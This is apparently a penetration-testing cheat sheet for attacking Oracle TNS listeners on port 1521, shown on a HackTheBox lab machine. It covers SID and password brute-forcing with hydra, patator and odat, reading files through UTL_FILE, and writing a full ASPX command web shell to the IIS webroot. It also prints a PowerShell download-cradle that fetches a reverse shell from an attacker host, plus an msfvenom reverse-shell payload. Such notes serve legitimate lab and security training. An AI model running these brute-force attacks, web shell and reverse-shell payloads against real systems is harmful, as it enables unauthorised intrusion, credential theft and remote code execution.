1521,1522-1529 - Oracle TNS Listener
TNS listener version
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>Other useful TNS listener commands:
Command
Purpose
ping
Ping the listener
version
Provide output of the listener version and platform information
status
Return the current status and variables used by the listener
services
Dump service data
debug
Dump debugging information to the listener log
reload
Reload the listener configuration file
save_config
Write the listener configuration file to a backup location
stop
Invoke listener shutdown
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listenerSID enumeration
What is a SID
The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
In some old versions (in 9 it works) you could ask for the SID and the database send it to you:
tnscmd10g status-p 1521 -h <IP> #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)If you cant access this way to the SIDs you will need to bruteforce them:
SID Bruteforce
I have merged the nmap and MSF sid lists into this one (without duplicates):
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sidsIn order to use oracle_login with patator you need to install:
pip3 install cx_Oracle --upgradeUser/Pass bruteforce
/opt/odat/odat.py sidguesser -s 10.10.10.82 -p 1521 --sids-file sids-oracle.txt
/opt/odat/odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521 --accounts-file /opt/odat/accounts/accounts.txt
To RCE
#Brute Fore Password
odat passwordguesser -d XE -s 10.10.10.82 -p 1521 --accounts-file /usr/share/odat/accounts/accounts.txt
#Try to access
sqlplus scott/tiger@10.10.10.82:1521/XE
SQL> SET PAGESIZE 500;
SQL> SET LINESIZE 500;
SQL> SELECT * FROM V$VERSION;
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE 11.2.0.2.0 Production
TNS for 64-bit Windows: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production
SQL> SELECT * FROM all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- ---------
XS$NULL 2147483638 29-MAY-14
SCOTT 48 01-JAN-18
APEX_040000 47 29-MAY-14
APEX_PUBLIC_USER 45 29-MAY-14
FLOWS_FILES 44 29-MAY-14
HR 43 29-MAY-14
MDSYS 42 29-MAY-14
ANONYMOUS 35 29-MAY-14
XDB 34 29-MAY-14
CTXSYS 32 29-MAY-14
APPQOSSYS 30 29-MAY-14
DBSNMP 29 29-MAY-14
ORACLE_OCM 21 29-MAY-14
DIP 14 29-MAY-14
OUTLN 9 29-MAY-14
SYSTEM 5 29-MAY-14
SYS 0 29-MAY-14
17 rows selected.
To check if the user’s creds are that of a sysdba or sysoper
SQL> SELECT * FROM user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
#But logging in with sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba' shows us a lot more
SQL> SELECT * FROM user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO
32 rows selected.
Read/write files in Oracle DB
Once you login as sysdba, we have the ability to run write special scripts allowing us the ability to read/write files using the UTL_FILE package. I took the code from here. To read the Windows hosts file, we can write a .sql script with the commands then run it by prefacing with @.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN ('C:/Windows/System32/drivers/etc','hosts','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;
/root@kali:~/CTF/HTB/Silo# rlwrap -r sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba'
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Dec 25 19:58:40 2020
Version 19.9.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
ql
SQL> @read_hosts.sql
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
PL/SQL procedure successfully completed.https://github.com/0xdea/exploits/blob/master/oracle/raptor_orafile.sql
I tested using this .sql script, uploading a simple text file to the default Windows IIS webroot folder.
root@kali:~/CTF/HTB/Silo# rlwrap -r sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba'
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Dec 25 20:00:24 2020
Version 19.9.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> @raptor_orafile.sql
Procedure created.
Procedure created.
SQL> exec utlwritefile('C:/inetpub/wwwroot', 'test.txt', 'Testing write');
PL/SQL procedure successfully completed.Then visiting http://10.10.10.82/test.txt we see
Upload aspx shell – RCE
SQL> exec utlwritefile('C:/inetpub/wwwroot', 'shell.aspx', '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Argumentsc "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><bodyasp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>');
PL/SQL procedure successfully completed.
*
ERROR at line 1:
ORA-29285: file write error
ORA-06512: at "SYS.UTL_FILE", line 77
ORA-06512: at "SYS.UTL_FILE", line 690
ORA-06512: at "SYS.UTLWRITEFILE", line 7
ORA-06512: at line 1
root@kali:~/CTF/HTB/Silo# echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.78/rshell.ps1")' | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADcAOAAvAHIAcwBoAGUAbABsAC4AcABzADEAIgApAAoA
OR
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.118 LPORT=1234 -f aspx > shell.aspx
odat dbmsxslprocessor -s silo.htb -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot" "shell.aspx" "/root/opt/silo/shell.aspx" --sysdbaLast updated